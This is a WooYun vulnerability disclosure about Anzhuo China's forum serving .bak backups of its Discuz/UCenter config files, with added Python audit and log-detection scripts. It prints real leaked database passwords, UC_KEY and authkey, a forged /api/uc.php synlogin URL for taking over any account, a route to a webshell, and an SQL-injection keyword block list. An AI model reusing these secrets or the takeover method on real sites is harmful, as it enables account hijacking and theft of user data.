
Vulnerability summary (24 followers)

Defect ID: wooyun-2013-043375

Title: Sensitive information leak # Anzhuo China (安卓中国) sensitive information leak puts 1.97 million users' records at risk

Vendor: 安卓中国

Author: 贱心

Submitted: 2013-11-19 18:23

Fix time: 2014-01-03 18:23

Public disclosure: 2014-01-03 18:23

Vulnerability type: Leak of important sensitive information

Severity: High

Self-assessed Rank: 20

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2013-11-19: Actively contacting the vendor and waiting for the vendor to claim the report; details withheld from the public
2014-01-03: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Sensitive information leak # Anzhuo China (安卓中国) sensitive information leak puts 1.97 million users' records at risk

Detailed description:

http://bbs.anzhuo.cn/config/config_ucenter.php.bak
http://bbs.anzhuo.cn/config/config_global.php.bak

<?php
define('UC_CONNECT', 'mysql');
define('UC_DBHOST', 'localhost');//192.168.1.40
define('UC_DBUSER', 'root');
define('UC_DBPW', 'anzhuo');
define('UC_DBNAME', 'anzhuotest');//anzhuouucenter
define('UC_DBCHARSET', 'gbk');
define('UC_DBTABLEPRE', '`anzhuotest`.pre_ucenter_');//`anzhuouucenter`.pre_ucenter_
define('UC_DBCONNECT', 0);
define('UC_CHARSET', 'gbk');
define('UC_KEY', 'W8d5oe47o2oa63DcT7q7AdXbO4e7m3o8J3FfV4y90fi9Y3E7Set7Y0tfn91dmeXa');
define('UC_API', 'http://www.anzhuo.cn/uc_server');
define('UC_APPID', '1');
define('UC_IP', '127.0.0.1');
define('UC_PPP', 20);


<?php
$_config = array();
// ---------------------------- CONFIG DB ----------------------------- //
$_config['db']['1']['dbhost'] = '192.168.1.36';//192.168.1.40
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'anzhuo';
$_config['db']['1']['dbcharset'] = 'gbk';
$_config['db']['1']['pconnect'] = '1';
$_config['db']['1']['dbname'] = 'anzhuotest';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';
// -------------------------- CONFIG MEMORY --------------------------- //
$_config['memory']['prefix'] = 'wvuLeb_';
$_config['memory']['eaccelerator'] = 0;
$_config['memory']['xcache'] = 0;
$_config['memory']['memcache']['server'] = '192.168.1.36';//192.168.1.40
$_config['memory']['memcache']['port'] = 11211;
$_config['memory']['memcache']['pconnect'] = 1;
$_config['memory']['memcache']['timeout'] = 1;
$_config['memory']['apc'] = 0;
// -------------------------- CONFIG SERVER --------------------------- //
$_config['server']['id'] = 1;
// ------------------------- CONFIG DOWNLOAD -------------------------- //
$_config['download']['readmod'] = 2;
$_config['download']['xsendfile']['type'] = '0';
$_config['download']['xsendfile']['dir'] = '/down/';
// --------------------------- CONFIG CACHE --------------------------- //
$_config['cache']['type'] = 'file';
// -------------------------- CONFIG OUTPUT --------------------------- //
$_config['output']['charset'] = 'gbk';
$_config['output']['forceheader'] = 1;
$_config['output']['gzip'] = '0';
$_config['output']['tplrefresh'] = 1;
$_config['output']['language'] = 'zh_cn';
$_config['output']['staticurl'] = 'static/';
$_config['output']['ajaxvalidate'] = '0';
$_config['output']['iecompatible'] = '0';
// -------------------------- CONFIG COOKIE --------------------------- //
$_config['cookie']['cookiepre'] = 'a2Lk_';
$_config['cookie']['cookiedomain'] = '.anzhuo.cn';
$_config['cookie']['cookiepath'] = '/';
// ------------------------- CONFIG SECURITY -------------------------- //
$_config['security']['authkey'] = 'fccf381Lz76houW7';
$_config['security']['urlxssdefend'] = 1;
$_config['security']['attackevasive'] = '0';
$_config['security']['querysafe']['status'] = 1;
$_config['security']['querysafe']['dfunction']['0'] = 'load_file';
$_config['security']['querysafe']['dfunction']['1'] = 'hex';
$_config['security']['querysafe']['dfunction']['2'] = 'substring';
$_config['security']['querysafe']['dfunction']['3'] = 'if';
$_config['security']['querysafe']['dfunction']['4'] = 'ord';
$_config['security']['querysafe']['dfunction']['5'] = 'char';
$_config['security']['querysafe']['daction']['0'] = 'intooutfile';
$_config['security']['querysafe']['daction']['1'] = 'intodumpfile';
$_config['security']['querysafe']['daction']['2'] = 'unionselect';
$_config['security']['querysafe']['daction']['3'] = '(select';
$_config['security']['querysafe']['dnote']['0'] = '/*';
$_config['security']['querysafe']['dnote']['1'] = '*/';
$_config['security']['querysafe']['dnote']['2'] = '#';
$_config['security']['querysafe']['dnote']['3'] = '--';
$_config['security']['querysafe']['dnote']['4'] = '"';
$_config['security']['querysafe']['dlikehex'] = 1;
$_config['security']['querysafe']['afullnote'] = 1;
// -------------------------- CONFIG ADMINCP -------------------------- //
// -------- Founders: $_config['admincp']['founder'] = '1,2,3'; --------- //
$_config['admincp']['founder'] = '1';
$_config['admincp']['forcesecques'] = '0';
$_config['admincp']['checkip'] = 1;
$_config['admincp']['runquery'] = 1;
$_config['admincp']['dbimport'] = 1;
// -------------------------- CONFIG REMOTE --------------------------- //
$_config['remote']['on'] = '0';
$_config['remote']['dir'] = 'remote';
$_config['remote']['appkey'] = '62cf0b3c3e6a4c9468e7216839721d8e';
$_config['remote']['cron'] = '0';
// Attachment download URL is set at: Admin panel => Global => Upload settings => Local attachment URL
// Attachment image URL
$_config['attachimageurl']='http://img.3g.cn/anzhuo/data/attachment/';//apk.anzhuo.cn/data/attachment/
// Avatar display URL
$_config['avatarurl']='http://www.anzhuo.cn/uc_server/';//www.anzhuo.cn/uc_server/
// ------------------- THE END -------------------- //
?>
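The two files above were reachable only because backup copies (`.bak`) of the live configuration files were left inside the document root, where the web server hands them out as plain text; together they expose the database password, `UC_KEY` and the Discuz `authkey`. The following Python audit is an added example and not part of the original report: it walks a web root, lists backup or editor copies of the sensitive config files, and reports which secret names each copy defines (names only, never values). The constructed sample web root, the placeholder values, and the extra suffix list and `config_default.php` entry beyond the report's `.bak` files are assumptions for illustration.

```python
import os
import re
import tempfile

# Suffixes that editors, deploy scripts and admins commonly leave next to the
# live file. ".bak" is the one in the report; the rest are common variants
# (assumption, extend for your own environment).
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", ".swp", ".swo", "~")

# Config files that must never be served raw. The two Discuz/UCenter names come
# from the report; config_default.php is a common companion file (assumption).
SENSITIVE_BASENAMES = {"config_global.php", "config_ucenter.php", "config_default.php"}

# Secret names worth reporting. Only the names are reported, never the values,
# so the audit output is safe to paste into a ticket.
SECRET_NAME_RE = re.compile(r"\b(UC_KEY|UC_DBPW|dbpw|authkey|appkey)\b")


def backup_of_sensitive(filename):
    """Return the live config name this file is a backup of, or None."""
    for suffix in BACKUP_SUFFIXES:
        if filename.endswith(suffix):
            base = filename[: -len(suffix)]
            if base in SENSITIVE_BASENAMES:
                return base
    return None


def find_backup_configs(webroot):
    """List backup copies of sensitive config files under webroot,
    as sorted paths relative to webroot."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if backup_of_sensitive(name):
                rel = os.path.relpath(os.path.join(dirpath, name), webroot)
                hits.append(rel.replace(os.sep, "/"))
    return sorted(hits)


def secret_names_in(path):
    """Return the sorted set of secret names defined in a file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        return sorted(set(SECRET_NAME_RE.findall(fh.read())))


def audit_webroot(webroot):
    """Map each exposed backup file to the secret names it contains."""
    return {rel: secret_names_in(os.path.join(webroot, rel))
            for rel in find_backup_configs(webroot)}


def build_sample_webroot():
    """Constructed web root for a stand-alone run: same layout as the
    report (config/ under the forum root), with placeholder values."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "config"))
    samples = {
        "config/config_global.php":
            "<?php\n$_config['db']['1']['dbpw'] = 'placeholder';\n",
        "config/config_global.php.bak":
            "<?php\n$_config['db']['1']['dbpw'] = 'placeholder';\n"
            "$_config['security']['authkey'] = 'placeholder';\n",
        "config/config_global.php~":
            "<?php\n$_config['db']['1']['dbpw'] = 'placeholder';\n",
        "config/config_ucenter.php.bak":
            "<?php\ndefine('UC_KEY', 'placeholder');\ndefine('UC_DBPW', 'placeholder');\n",
        "index.php.bak": "<?php echo 'not a config file';\n",  # backup, but not sensitive
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, names in audit_webroot(build_sample_webroot()).items():
        print(f"{rel}: exposes {', '.join(names) or 'no recognised secret names'}")
```

Run it against the real document root instead of the sample; every hit should be deleted and, because the file may already have been fetched, every secret name it reports should be treated as compromised and rotated. Pair the audit with a web server rule that refuses to serve the backup suffixes at all, so a future stray copy fails closed.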

Proof of vulnerability:

Could not find the database's public IP, and it most likely does not accept external connections anyway.
So here we use uc_key instead.
With uc_key we can get a shell directly.
Reference: WooYun: Sensitive information leak # 动漫东东 sensitive information leak lets 1,000,000+ user records be dumped
Unfortunately the simple getshell method failed, and the other getshell method is rather cumbersome.
So let's try using uc_key to log into an arbitrary user's account.
File: /api/uc.php
We use this interface: synlogin
Code snippet:

function synlogin($get, $post) {
    global $_G;
    if(!API_SYNLOGIN) {
        return API_RETURN_FORBIDDEN;
    }
    header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
    $cookietime = 31536000;
    // $get holds the request decrypted with UC_KEY; the uid inside it is trusted as-is,
    // so whoever holds UC_KEY chooses the account.
    $uid = intval($get['uid']);
    if(($member = getuserbyuid($uid, 1))) {
        // A valid login cookie is issued for that uid without any password check.
        dsetcookie('auth', authcode("$member[password]\t$member[uid]", 'ENCODE'), $cookietime);
    }
}


Exploit script omitted.
Using the API to enter an arbitrary user's account:

http://bbs.anzhuo.cn/api/uc.php?code=8f76D6txUKXpTJV571iAy5BZbTUBP%2BFzouNzXVOTEe3qNDOoNnhRvBE8LT7kr0v%2BShnMQywzGTV2U2bY7By2mPHjEbyCzbJewxtJQbHDPcp9b5hZP72unXUYMFc


[Screenshot: QQ截图20131119181413.jpg]


[Screenshot: QQ截图20131119181533.jpg]


uc_key can also be used to obtain a webshell.
Method: change the administrator's password (set up a local Discuz and use uc_key to change the anzhuo.cn administrator's password), then obtain a webshell from the admin panel.
Anzhuo China has 1.97 million+ users.

[Screenshot: QQ截图20131119181843.jpg]
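The attack sequence in this report leaves a recognisable trail in the web server's access log: a client first retrieves a `.bak` copy of a config file, then calls `/api/uc.php` with a `code` parameter it could only have built with the leaked UC_KEY. The following Python detector is an added example, not part of the original report: it parses combined-format access log lines, flags backup or editor files that were served (or probed for), decodes `%xx` escapes so an obfuscated suffix is still caught, and flags any `/api/uc.php` call from a client that previously obtained a backup file. The log lines, IP addresses and `code` values are constructed placeholders; the suffix list beyond `.bak` is an assumption.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined-format access log line (Apache/nginx default layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Backup/editor suffixes; ".bak" is the one in the report, the rest are assumptions.
BACKUP_RE = re.compile(r"(\.bak|\.old|\.orig|\.save|\.swp|~)$")
# Discuz app-side UCenter endpoint the report abuses (synlogin lives here).
UC_API_PATH = "/api/uc.php"

# Constructed sample log. 203.0.113.5 replays the report's sequence;
# 198.51.100.7 is a normal user whose browser performs synlogin after logging
# in elsewhere; 198.51.100.9 probes for a backup file that does not exist.
SAMPLE_LOG = """\
203.0.113.5 - - [19/Nov/2013:18:10:01 +0800] "GET /config/config_ucenter.php.bak HTTP/1.1" 200 812 "-" "curl/7.22.0"
203.0.113.5 - - [19/Nov/2013:18:10:03 +0800] "GET /config/config_global%2Ephp.bak HTTP/1.1" 200 4210 "-" "curl/7.22.0"
198.51.100.7 - - [19/Nov/2013:18:11:40 +0800] "GET /api/uc.php?code=LEGIT_PLACEHOLDER HTTP/1.1" 200 0 "http://www.anzhuo.cn/" "Mozilla/5.0"
203.0.113.5 - - [19/Nov/2013:18:14:13 +0800] "GET /api/uc.php?code=FORGED_PLACEHOLDER HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [19/Nov/2013:18:14:15 +0800] "GET /forum.php HTTP/1.1" 200 30011 "-" "Mozilla/5.0"
198.51.100.9 - - [19/Nov/2013:18:20:00 +0800] "GET /config/config_global.php.bak HTTP/1.1" 404 201 "-" "python-requests/2.0"
"""


def parse_line(line):
    """Parse one access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Normalise the path: decode %xx escapes so "%2Ebak" is seen as ".bak",
    # drop the query string, and lower-case for suffix matching.
    rec["path"] = unquote(urlsplit(rec["target"]).path).lower()
    rec["status"] = int(rec["status"])
    return rec


def analyze(lines):
    """Return (kind, client_ip, path) alerts in log order.

    kinds:
      backup_file_served        - a backup/editor copy was returned with 200
      backup_file_probe         - a backup path was requested but not served
      uc_api_after_backup_fetch - a client that already pulled a backup file
                                  then called /api/uc.php (UC_KEY now suspect)
    """
    alerts = []
    leaked_to = set()  # client IPs that obtained a backup file
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec["ip"], rec["path"], rec["status"]
        if BACKUP_RE.search(path):
            if status == 200:
                alerts.append(("backup_file_served", ip, path))
                leaked_to.add(ip)
            else:
                alerts.append(("backup_file_probe", ip, path))
        elif path == UC_API_PATH and ip in leaked_to:
            alerts.append(("uc_api_after_backup_fetch", ip, path))
    return alerts


if __name__ == "__main__":
    for kind, ip, path in analyze(SAMPLE_LOG.splitlines()):
        print(f"{kind:26} {ip:14} {path}")
```

Two caveats for anyone deploying this. First, `/api/uc.php` cannot simply be blocked: in UCenter's design the synlogin call is made by the browser of a user who just logged in through another application, so the endpoint sees ordinary user traffic and the correlation with an earlier backup-file fetch is what makes a call suspicious, not the call itself. Second, a single served backup file already means the key is burned; the remediation is to rotate UC_KEY in UCenter and in every application's config_ucenter.php, rotate the database password and authkey, and then review account activity, rather than to rely on log-based detection alone.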

Fix recommendation:

null

Copyright notice: please credit 贱心@乌云 when reposting.


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused the report